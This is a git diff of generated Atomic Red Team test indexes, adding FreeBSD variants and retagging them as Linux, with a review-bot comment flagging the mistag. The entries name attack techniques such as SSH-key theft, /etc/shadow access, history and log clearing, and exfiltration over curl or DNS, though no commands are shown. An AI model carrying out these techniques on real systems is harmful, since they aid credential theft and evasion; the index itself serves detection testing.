+credential-access,T1040,Network Sniffing,11,Filtered Packet Capture FreeBSD using /dev/bpfN with sudo,a3a0d4c9-c068-4563-a08d-583bd05b884c,sh
 credential-access,T1040,Network Sniffing,12,"Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo",10c710c9-9104-4d5f-8829-5b65391e2a29,bash
 credential-access,T1040,Network Sniffing,13,"Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo",7a0895f0-84c1-4adf-8491-a21510b1d4c1,bash
 credential-access,T1040,Network Sniffing,14,"Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo",515575ab-d213-42b1-aa64-ef6a2dd4641b,bash
@@ -230,14 +312,20 @@ credential-access,T1552,Unsecured Credentials,1,AWS - Retrieve EC2 Password Data
 credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,9,LaZagne.py - Dump Credentials from Firefox Browser,87e88698-621b-4c45-8a89-4eaebdeaabb1,sh
 credential-access,T1552.004,Unsecured Credentials: Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
 credential-access,T1552.004,Unsecured Credentials: Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh
+credential-access,T1552.004,Unsecured Credentials: Private Keys,4,Copy Private SSH Keys with CP (freebsd),12e4a260-a7fd-4ed8-bf18-1a28c1395775,sh
 credential-access,T1552.004,Unsecured Credentials: Private Keys,5,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh
+credential-access,T1552.004,Unsecured Credentials: Private Keys,6,Copy Private SSH Keys with rsync (freebsd),922b1080-0b95-42b0-9585-b9a5ea0af044,sh
 credential-access,T1552.004,Unsecured Credentials: Private Keys,7,Copy the users GnuPG directory with rsync,2a5a0601-f5fb-4e2e-aa09-73282ae6afca,sh
+credential-access,T1552.004,Unsecured Credentials: Private Keys,8,Copy the users GnuPG directory with rsync (freebsd),b05ac39b-515f-48e9-88e9-2f141b5bcad0,sh
 credential-access,T1552.003,Unsecured Credentials: Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
+credential-access,T1552.003,Unsecured Credentials: Bash History,2,Search Through sh History,d87d3b94-05b4-40f2-a80f-99864ffa6803,sh
 credential-access,T1552.001,Unsecured Credentials: Credentials In Files,1,Find AWS credentials,2b93758e-a8d7-4e3b-bc7b-d3aa8d7ecb17,sh
 credential-access,T1552.001,Unsecured Credentials: Credentials In Files,3,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
 credential-access,T1552.001,Unsecured Credentials: Credentials In Files,6,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
 credential-access,T1110.004,Brute Force: Credential Stuffing,1,SSH Credential Stuffing From Linux,4f08197a-2a8a-472d-9589-cd2895ef22ad,bash
+credential-access,T1110.004,Brute Force: Credential Stuffing,3,SSH Credential Stuffing From FreeBSD,a790d50e-7ebf-48de-8daa-d9367e0911d4,sh
 credential-access,T1003.008,"OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow",1,Access /etc/shadow (Local),3723ab77-c546-403c-8fb4-bb577033b235,bash
+credential-access,T1003.008,"OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow",2,Access /etc/master.passwd (Local),5076874f-a8e6-4077-8ace-9e5ab54114a5,sh
 credential-access,T1003.008,"OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow",3,Access /etc/passwd (Local),60e860b6-8ae6-49db-ad07-5e73edd88f5d,sh
 credential-access,T1003.008,"OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow",4,"Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat",df1a55ae-019d-4120-bc35-94f4bc5c4b0a,sh
 credential-access,T1003.008,"OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow",5,"Access /etc/{shadow,passwd,master.passwd} with shell builtins",f5aa6543-6cb2-4fae-b9c2-b96e14721713,sh
@@ -248,30 +336,42 @@ discovery,T1087.001,Account Discovery: Local Account,2,View sudoers access,fed9b
 discovery,T1087.001,Account Discovery: Local Account,3,View accounts with UID 0,c955a599-3653-4fe5-b631-f11c00eb0397,sh
 discovery,T1087.001,Account Discovery: Local Account,4,List opened files by user,7e46c7a5-0142-45be-a858-1a3ecb4fd3cb,sh
 discovery,T1087.001,Account Discovery: Local Account,5,Show if a user account has ever logged in remotely,0f0b6a29-08c3-44ad-a30b-47fd996b2110,sh
+discovery,T1087.001,Account Discovery: Local Account,6,Show if a user account has ever logged in remotely (freebsd),0f73418f-d680-4383-8a24-87bc97fe4e35,sh
 discovery,T1087.001,Account Discovery: Local Account,7,Enumerate users and groups,e6f36545-dc1e-47f0-9f48-7f730f54a02e,sh
 discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
+discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,2,Detect Virtualization Environment (FreeBSD),e129d73b-3e03-4ae9-bf1e-67fc8921e0fd,sh
 discovery,T1069.002,Permission Groups Discovery: Domain Groups,15,Active Directory Domain Search Using LDAP - Linux (Ubuntu)/macOS,d58d749c-4450-4975-a9e9-8b1d562755c2,sh
 discovery,T1007,System Service Discovery,3,System Service Discovery - systemctl,f4b26bce-4c2c-46c0-bcc5-fce062d38bef,bash
+discovery,T1007,System Service Discovery,4,System Service Discovery - service,b2e1c734-7336-40f9-b970-b04731cbaf8a,sh
 discovery,T1040,Network Sniffing,1,Packet Capture Linux using tshark or tcpdump,7fe741f7-b265-4951-a7c7-320889083b3e,bash
+discovery,T1040,Network Sniffing,2,Packet Capture FreeBSD using tshark or tcpdump,c93f2492-9ebe-44b5-8b45-36574cccfe67,sh
+discovery,T1040,Network Sniffing,10,Packet Capture FreeBSD using /dev/bpfN with sudo,e2028771-1bfb-48f5-b5e6-e50ee0942a14,sh
+discovery,T1040,Network Sniffing,11,Filtered Packet Capture FreeBSD using /dev/bpfN with sudo,a3a0d4c9-c068-4563-a08d-583bd05b884c,sh
 discovery,T1040,Network Sniffing,12,"Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo",10c710c9-9104-4d5f-8829-5b65391e2a29,bash
 discovery,T1040,Network Sniffing,13,"Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo",7a0895f0-84c1-4adf-8491-a21510b1d4c1,bash
 discovery,T1040,Network Sniffing,14,"Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo",515575ab-d213-42b1-aa64-ef6a2dd4641b,bash
 discovery,T1040,Network Sniffing,15,"Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo",b1cbdf8b-6078-48f5-a890-11ea19d7f8e9,bash
 discovery,T1135,Network Share Discovery,2,Network Share Discovery - linux,875805bc-9e86-4e87-be86-3a5527315cae,bash
+discovery,T1135,Network Share Discovery,3,Network Share Discovery - FreeBSD,77e468a6-3e5c-45a1-9948-c4b5603747cb,sh
 discovery,T1082,System Information Discovery,3,List OS Information,cccb070c-df86-4216-a5bc-9fb60c74e27c,sh
 discovery,T1082,System Information Discovery,4,Linux VM Check via Hardware,31dad7ad-2286-4c02-ae92-274418c85fec,bash
 discovery,T1082,System Information Discovery,5,Linux VM Check via Kernel Modules,8057d484-0fae-49a4-8302-4812c4f1e64e,bash
+discovery,T1082,System Information Discovery,6,FreeBSD VM Check via Kernel Modules,eefe6a49-d88b-41d8-8fc2-b46822da90d3,sh
 discovery,T1082,System Information Discovery,8,Hostname Discovery,486e88ea-4f56-470f-9b57-3f4d73f39133,sh
 discovery,T1082,System Information Discovery,12,"Environment variables discovery on freebsd, macos and linux",fcbdd43f-f4ad-42d5-98f3-0218097e2720,sh
 discovery,T1082,System Information Discovery,25,Linux List Kernel Modules,034fe21c-3186-49dd-8d5d-128b35f181c7,sh
+discovery,T1082,System Information Discovery,26,FreeBSD List Kernel Modules,4947897f-643a-4b75-b3f5-bed6885749f6,sh
 discovery,T1217,Browser Bookmark Discovery,1,List Mozilla Firefox Bookmark Database Files on FreeBSD/Linux,3a41f169-a5ab-407f-9269-abafdb5da6c2,sh
+discovery,T1217,Browser Bookmark Discovery,4,List Google Chromium Bookmark JSON Files on FreeBSD,88ca025b-3040-44eb-9168-bd8af22b82fa,sh
 discovery,T1016,System Network Configuration Discovery,3,System Network Configuration Discovery,c141bbdb-7fca-4254-9fd6-f47e79447e17,sh
+discovery,T1016,System Network Configuration Discovery,4,System Network Configuration Discovery (freebsd),7625b978-4efd-47de-8744-add270374bee,sh
 discovery,T1083,File and Directory Discovery,3,Nix File and Directory Discovery,ffc8b249-372a-4b74-adcd-e4c0430842de,sh
 discovery,T1083,File and Directory Discovery,4,Nix File and Directory Discovery 2,13c5e1ae-605b-46c4-a79f-db28c77ff24e,sh
 discovery,T1049,System Network Connections Discovery,3,"System Network Connections Discovery FreeBSD, Linux & MacOS",9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
 discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b39d-38d9791407cc,sh
 discovery,T1069.001,Permission Groups Discovery: Local Groups,1,Permission Groups Discovery (Local),952931a4-af0b-4335-bbbe-73c8c5b327ae,sh
 discovery,T1201,Password Policy Discovery,1,Examine password complexity policy - Ubuntu,085fe567-ac84-47c7-ac4c-2688ce28265b,bash
+discovery,T1201,Password Policy Discovery,2,Examine password complexity policy - FreeBSD,a7893624-a3d7-4aed-9676-80498f31820f,sh
 discovery,T1201,Password Policy Discovery,3,Examine password complexity policy - CentOS/RHEL 7.x,78a12e65-efff-4617-bc01-88f17d71315d,bash
 discovery,T1201,Password Policy Discovery,4,Examine password complexity policy - CentOS/RHEL 6.x,6ce12552-0adb-4f56-89ff-95ce268f6358,bash
 discovery,T1201,Password Policy Discovery,5,Examine password expiration policy - All Linux,7c86c55c-70fa-4a05-83c9-3aa19b145d1a,bash
@@ -280,13 +380,16 @@ discovery,T1614.001,System Location Discovery: System Language Discovery,4,Disco
 discovery,T1614.001,System Location Discovery: System Language Discovery,5,Discover System Language by locale file,5d7057c9-2c8a-4026-91dd-13b5584daa69,sh
 discovery,T1614.001,System Location Discovery: System Language Discovery,6,Discover System Language by Environment Variable Query,cb8f7cdc-36c4-4ed0-befc-7ad7d24dfd7a,sh
 discovery,T1518.001,Software Discovery: Security Software Discovery,4,Security Software Discovery - ps (Linux),23b91cd2-c99c-4002-9e41-317c63e024a2,sh
+discovery,T1518.001,Software Discovery: Security Software Discovery,5,Security Software Discovery - pgrep (FreeBSD),fa96c21c-5fd6-4428-aa28-51a2fbecdbdc,sh
 discovery,T1018,Remote System Discovery,6,Remote System Discovery - arp nix,acb6b1ff-e2ad-4d64-806c-6c35fe73b951,sh
 discovery,T1018,Remote System Discovery,7,Remote System Discovery - sweep,96db2632-8417-4dbb-b8bb-a8b92ba391de,sh
 discovery,T1018,Remote System Discovery,12,Remote System Discovery - ip neighbour,158bd4dd-6359-40ab-b13c-285b9ef6fa25,sh
 discovery,T1018,Remote System Discovery,13,Remote System Discovery - ip route,1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1,sh
+discovery,T1018,Remote System Discovery,14,Remote System Discovery - netstat,d2791d72-b67f-4615-814f-ec824a91f514,sh
 discovery,T1018,Remote System Discovery,15,Remote System Discovery - ip tcp_metrics,6c2da894-0b57-43cb-87af-46ea3b501388,sh
 discovery,T1046,Network Service Discovery,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,bash
 discovery,T1046,Network Service Discovery,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
+discovery,T1046,Network Service Discovery,3,Port Scan Nmap for FreeBSD,f03d59dc-0e3b-428a-baeb-3499552c7048,sh
 impact,T1531,Account Access Removal,4,Change User Password via passwd,3c717bf3-2ecc-4d79-8ac8-0bfbf08fbce6,sh
 impact,T1486,Data Encrypted for Impact,1,Encrypt files using gpg (FreeBSD/Linux),7b8ce084-3922-4618-8d22-95f996173765,sh
impact,T1486,Data Encrypted for Impact,2,Encrypt files using 7z (FreeBSD/Linux),53e6735a-4727-44cc-b35b-237682a151ad,sh 
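Review bot: The `+` rows in this hunk register FreeBSD-only atomics in linux-index.csv — `Security Software Discovery - pgrep (FreeBSD)` and `Port Scan Nmap for FreeBSD` — so the Linux index now lists tests that cannot run on a Linux host; the same pattern appears in the `@@ -298`, `@@ -316` and `@@ -335` hunks of this file (FreeBSD variants of reboot, cron, login-shell and account tests). The index.md hunks later in this commit show the likely cause: every `[freebsd]` platform tag is rewritten to `[linux]` and `freebsd` is dropped from mixed lists (for example `Atomic Test #10: chflags - Remove immutable file attribute [freebsd]` becomes `[linux]`), which looks like the doc generator, or the atomics' declared platform list it reads (presumably `supported_platforms`), losing the freebsd platform rather than an intended change. Because this commit is generator output, the fix belongs upstream and is not visible here; I would hold the regenerated indexes until the platform mapping is confirmed, since anyone selecting tests by platform from these files will schedule FreeBSD-only tests against Linux and get inflated Linux coverage counts.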
@@ -298,11 +401,14 @@ impact,T1529,System Shutdown/Reboot,3,Restart System via `shutdown` - FreeBSD/ma
 impact,T1529,System Shutdown/Reboot,4,Shutdown System via `shutdown` - FreeBSD/macOS/Linux,4963a81e-a3ad-4f02-adda-812343b351de,sh
 impact,T1529,System Shutdown/Reboot,5,Restart System via `reboot` - FreeBSD/macOS/Linux,47d0b042-a918-40ab-8cf9-150ffe919027,sh
 impact,T1529,System Shutdown/Reboot,6,Shutdown System via `halt` - FreeBSD/Linux,918f70ab-e1ef-49ff-bc57-b27021df84dd,sh
+impact,T1529,System Shutdown/Reboot,7,Reboot System via `halt` - FreeBSD,7b1cee42-320f-4890-b056-d65c8b884ba5,sh
 impact,T1529,System Shutdown/Reboot,8,Reboot System via `halt` - Linux,78f92e14-f1e9-4446-b3e9-f1b921f2459e,bash
 impact,T1529,System Shutdown/Reboot,9,Shutdown System via `poweroff` - FreeBSD/Linux,73a90cd2-48a2-4ac5-8594-2af35fa909fa,sh
+impact,T1529,System Shutdown/Reboot,10,Reboot System via `poweroff` - FreeBSD,5a282e50-86ff-438d-8cef-8ae01c9e62e1,sh
 impact,T1529,System Shutdown/Reboot,11,Reboot System via `poweroff` - Linux,61303105-ff60-427b-999e-efb90b314e41,bash
 execution,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,sh
 execution,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
+execution,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /etc/cron.d folder,078e69eb-d9fb-450e-b9d0-2e118217c846,sh
 execution,T1053.003,Scheduled Task/Job: Cron,4,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
 execution,T1053.006,Scheduled Task/Job: Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
 execution,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh
@@ -316,18 +422,26 @@ execution,T1059.004,Command and Scripting Interpreter: Bash,6,What shell is runn
 execution,T1059.004,Command and Scripting Interpreter: Bash,7,What shells are available,bf23c7dc-1004-4949-8262-4c1d1ef87702,sh
 execution,T1059.004,Command and Scripting Interpreter: Bash,8,Command line scripts,b04ed73c-7d43-4dc8-b563-a2fc595cba1a,sh
 execution,T1059.004,Command and Scripting Interpreter: Bash,9,Obfuscated command line scripts,5bec4cc8-f41e-437b-b417-33ff60acf9af,sh
+execution,T1059.004,Command and Scripting Interpreter: Bash,10,Obfuscated command line scripts (freebsd),5dc1d9dd-f396-4420-b985-32b1c4f79062,sh
 execution,T1059.004,Command and Scripting Interpreter: Bash,11,Change login shell,c7ac59cb-13cc-4622-81dc-6d2fee9bfac7,bash
+execution,T1059.004,Command and Scripting Interpreter: Bash,12,Change login shell (freebsd),33b68b9b-4988-4caf-9600-31b7bf04227c,sh
 execution,T1059.004,Command and Scripting Interpreter: Bash,13,Environment variable scripts,bdaebd56-368b-4970-a523-f905ff4a8a51,bash
+execution,T1059.004,Command and Scripting Interpreter: Bash,14,Environment variable scripts (freebsd),663b205d-2121-48a3-a6f9-8c9d4d87dfee,sh
 execution,T1059.004,Command and Scripting Interpreter: Bash,15,Detecting pipe-to-shell,fca246a8-a585-4f28-a2df-6495973976a1,bash
+execution,T1059.004,Command and Scripting Interpreter: Bash,16,Detecting pipe-to-shell (freebsd),1a06b1ec-0cca-49db-a222-3ebb6ef25632,sh
 execution,T1059.004,Command and Scripting Interpreter: Bash,17,Current kernel information enumeration,3a53734a-9e26-4f4b-ad15-059e767f5f14,sh
 execution,T1059.006,Command and Scripting Interpreter: Python,1,Execute shell script via python's command mode arguement,3a95cdb2-c6ea-4761-b24e-02b71889b8bb,sh
 execution,T1059.006,Command and Scripting Interpreter: Python,2,Execute Python via scripts,6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8,sh
 execution,T1059.006,Command and Scripting Interpreter: Python,3,Execute Python via Python executables,0b44d79b-570a-4b27-a31f-3bf2156e5eaa,sh
 execution,T1059.006,Command and Scripting Interpreter: Python,4,Python pty module and spawn function used to spawn sh or bash,161d694c-b543-4434-85c3-c3a433e33792,sh
 execution,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
+execution,T1053.002,Scheduled Task/Job: At,3,At - Schedule a job freebsd,549863fb-1c91-467e-97fc-1fa32b9f356b,sh
 initial-access,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
+initial-access,T1078.003,Valid Accounts: Local Accounts,9,Create local account (FreeBSD),95158cc9-8f6d-4889-9531-9be3f7f095e0,sh
 initial-access,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
+initial-access,T1078.003,Valid Accounts: Local Accounts,11,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
 initial-access,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
+initial-access,T1078.003,Valid Accounts: Local Accounts,13,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
 exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,2,"Exfiltrate data HTTPS using curl freebsd,linux or macos",4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01,bash
 exfiltration,T1048,Exfiltration Over Alternative Protocol,1,Exfiltration Over Alternative Protocol - SSH,f6786cc8-beda-4915-a4d6-ac2f193bb988,sh
 exfiltration,T1048,Exfiltration Over Alternative Protocol,2,Exfiltration Over Alternative Protocol - SSH,7c3cb337-35ae-4d06-bf03-3032ed2ec268,sh
@@ -335,3 +449,4 @@ exfiltration,T1030,Data Transfer Size Limits,1,Data Transfer Size Limits,ab936c5
 exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,1,Exfiltration Over Alternative Protocol - HTTP,1d1abbd6-a3d3-4b2e-bef5-c59293f46eff,manual
 exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,3,Exfiltration Over Alternative Protocol - DNS,c403b5a4-b5fc-49f2-b181-d1c80d27db45,manual
 exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,8,Python3 http.server,3ea1f938-f80a-4305-9aa8-431bc4867313,sh
+exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,9,Python3 http.server (freebsd),57a303a2-0bc6-400d-b144-4f3292920a0b,sh
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 4dd99e2dd8..efb41cdece 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -24,25 +24,25 @@
 - T1150 Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
 - Atomic Test #1: Malicious PAM rule [linux]
- - Atomic Test #2: Malicious PAM rule (freebsd) [freebsd]
+ - Atomic Test #2: Malicious PAM rule (freebsd) [linux]
 - Atomic Test #3: Malicious PAM module [linux]
 - T1578.004 Revert Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1148 HISTCONTROL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md)
- - Atomic Test #1: chmod - Change file or folder mode (numeric mode) [freebsd, macos, linux]
- - Atomic Test #2: chmod - Change file or folder mode (symbolic mode) [freebsd, macos, linux]
- - Atomic Test #3: chmod - Change file or folder mode (numeric mode) recursively [freebsd, macos, linux]
- - Atomic Test #4: chmod - Change file or folder mode (symbolic mode) recursively [freebsd, macos, linux]
+ - Atomic Test #1: chmod - Change file or folder mode (numeric mode) [linux, macos]
+ - Atomic Test #2: chmod - Change file or folder mode (symbolic mode) [linux, macos]
+ - Atomic Test #3: chmod - Change file or folder mode (numeric mode) recursively [linux, macos]
+ - Atomic Test #4: chmod - Change file or folder mode (symbolic mode) recursively [linux, macos]
 - Atomic Test #5: chown - Change file or folder ownership and group [macos, linux]
 - Atomic Test #6: chown - Change file or folder ownership and group recursively [macos, linux]
- - Atomic Test #7: chown - Change file or folder mode ownership only [freebsd, macos, linux]
+ - Atomic Test #7: chown - Change file or folder mode ownership only [linux, macos]
 - Atomic Test #8: chown - Change file or folder ownership recursively [macos, linux]
 - Atomic Test #9: chattr - Remove immutable file attribute [macos, linux]
- - Atomic Test #10: chflags - Remove immutable file attribute [freebsd]
+ - Atomic Test #10: chflags - Remove immutable file attribute [linux]
 - Atomic Test #11: Chmod through c script [macos, linux]
- - Atomic Test #12: Chmod through c script (freebsd) [freebsd]
+ - Atomic Test #12: Chmod through c script (freebsd) [linux]
 - Atomic Test #13: Chown through c script [macos, linux]
- - Atomic Test #14: Chown through c script (freebsd) [freebsd]
+ - Atomic Test #14: Chown through c script (freebsd) [linux]
 - [T1216.001 Signed Script Proxy Execution: Pubprn](../../T1216.001/T1216.001.md)
 - Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
 - T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -84,11 +84,11 @@
 - T1099 Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md)
 - Atomic Test #1: Sudo usage [macos, linux]
- - Atomic Test #2: Sudo usage (freebsd) [freebsd]
+ - Atomic Test #2: Sudo usage (freebsd) [linux]
 - Atomic Test #3: Unlimited sudo cache timeout [macos, linux]
- - Atomic Test #4: Unlimited sudo cache timeout (freebsd) [freebsd]
+ - Atomic Test #4: Unlimited sudo cache timeout (freebsd) [linux]
 - Atomic Test #5: Disable tty_tickets for sudo caching [macos, linux]
- - Atomic Test #6: Disable tty_tickets for sudo caching (freebsd) [freebsd]
+ - Atomic Test #6: Disable tty_tickets for sudo caching (freebsd) [linux]
 - T1578 Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1542.001 System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md)
@@ -99,7 +99,7 @@
 - T1218.013 Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1093 Process Hollowing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1036.005 Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
- - Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux, freebsd]
+ - Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux]
 - Atomic Test #2: Masquerade as a built-in system executable [windows]
 - T1600 Weaken Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1036.008 Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -118,24 +118,24 @@
 - T1542.005 TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
 - Atomic Test #1: Detect Virtualization Environment (Linux) [linux]
- - Atomic Test #2: Detect Virtualization Environment (FreeBSD) [freebsd]
+ - Atomic Test #2: Detect Virtualization Environment (FreeBSD) [linux]
 - Atomic Test #3: Detect Virtualization Environment (Windows) [windows]
 - Atomic Test #4: Detect Virtualization Environment (MacOS) [macos]
 - Atomic Test #5: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) [windows]
 - [T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs](../../T1070.002/T1070.002.md)
 - Atomic Test #1: rm -rf [macos, linux]
- - Atomic Test #2: rm -rf [freebsd]
+ - Atomic Test #2: rm -rf [linux]
 - Atomic Test #3: Delete log files using built-in log utility [macos]
 - Atomic Test #4: Truncate system log files via truncate utility [macos]
- - Atomic Test #5: Truncate system log files via truncate utility (freebsd) [freebsd]
+ - Atomic Test #5: Truncate system log files via truncate utility (freebsd) [linux]
 - Atomic Test #6: Delete log files via cat utility by appending /dev/null or /dev/zero [macos]
- - Atomic Test #7: Delete log files via cat utility by appending /dev/null or /dev/zero (freebsd) [freebsd]
+ - Atomic Test #7: Delete log files via cat utility by appending /dev/null or /dev/zero (freebsd) [linux]
 - Atomic Test #8: System log file deletion via find utility [macos]
 - Atomic Test #9: Overwrite macOS system log via echo utility [macos]
- - Atomic Test #10: Overwrite FreeBSD system log via echo utility [freebsd]
+ - Atomic Test #10: Overwrite FreeBSD system log via echo utility [linux]
 - Atomic Test #11: Real-time system log clearance/deletion [macos]
 - Atomic Test #12: Delete system log files via unlink utility [macos]
- - Atomic Test #13: Delete system log files via unlink utility (freebsd) [freebsd]
+ - Atomic Test #13: Delete system log files via unlink utility (freebsd) [linux]
 - Atomic Test #14: Delete system log files using shred utility [macos]
 - Atomic Test #15: Delete system log files using srm utility [macos]
 - Atomic Test #16: Delete system log files using OSAScript [macos]
@@ -183,21 +183,21 @@
 - T1600.001 Reduce Key Space [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1070.003 Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md)
 - Atomic Test #1: Clear Bash history (rm) [linux, macos]
- - Atomic Test #2: Clear sh history (rm) [freebsd]
+ - Atomic Test #2: Clear sh history (rm) [linux]
 - Atomic Test #3: Clear Bash history (echo) [linux]
- - Atomic Test #4: Clear sh history (echo) [freebsd]
+ - Atomic Test #4: Clear sh history (echo) [linux]
 - Atomic Test #5: Clear Bash history (cat dev/null) [linux, macos]
- - Atomic Test #6: Clear sh history (cat dev/null) [freebsd]
+ - Atomic Test #6: Clear sh history (cat dev/null) [linux]
 - Atomic Test #7: Clear Bash history (ln dev/null) [linux, macos]
- - Atomic Test #8: Clear sh history (ln dev/null) [freebsd]
+ - Atomic Test #8: Clear sh history (ln dev/null) [linux]
 - Atomic Test #9: Clear Bash history (truncate) [linux]
- - Atomic Test #10: Clear sh history (truncate) [freebsd]
+ - Atomic Test #10: Clear sh history (truncate) [linux]
 - Atomic Test #11: Clear history of a bunch of shells [linux, macos]
- - Atomic Test #12: Clear history of a bunch of shells (freebsd) [freebsd]
+ - Atomic Test #12: Clear history of a bunch of shells (freebsd) [linux]
 - Atomic Test #13: Clear and Disable Bash History Logging [linux, macos]
 - Atomic Test #14: Use Space Before Command to Avoid Logging to History [linux, macos]
 - Atomic Test #15: Disable Bash History Logging with SSH -T [linux]
- - Atomic Test #16: Disable sh History Logging with SSH -T (freebsd) [freebsd]
+ - Atomic Test #16: Disable sh History Logging with SSH -T (freebsd) [linux]
 - Atomic Test #17: Prevent Powershell History Logging [windows]
 - Atomic Test #18: Clear Powershell History by Deleting History File [windows]
 - Atomic Test #19: Set Custom AddToHistoryHandler to Avoid History File Logging [windows]
@@ -209,12 +209,12 @@
 - [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md)
 - Atomic Test #1: Deobfuscate/Decode Files Or Information [windows]
 - Atomic Test #2: Certutil Rename and Decode [windows]
- - Atomic Test #3: Base64 decoding with Python [freebsd, linux, macos]
- - Atomic Test #4: Base64 decoding with Perl [freebsd, linux, macos]
+ - Atomic Test #3: Base64 decoding with Python [linux, macos]
+ - Atomic Test #4: Base64 decoding with Perl [linux, macos]
 - Atomic Test #5: Base64 decoding with shell utilities [linux, macos]
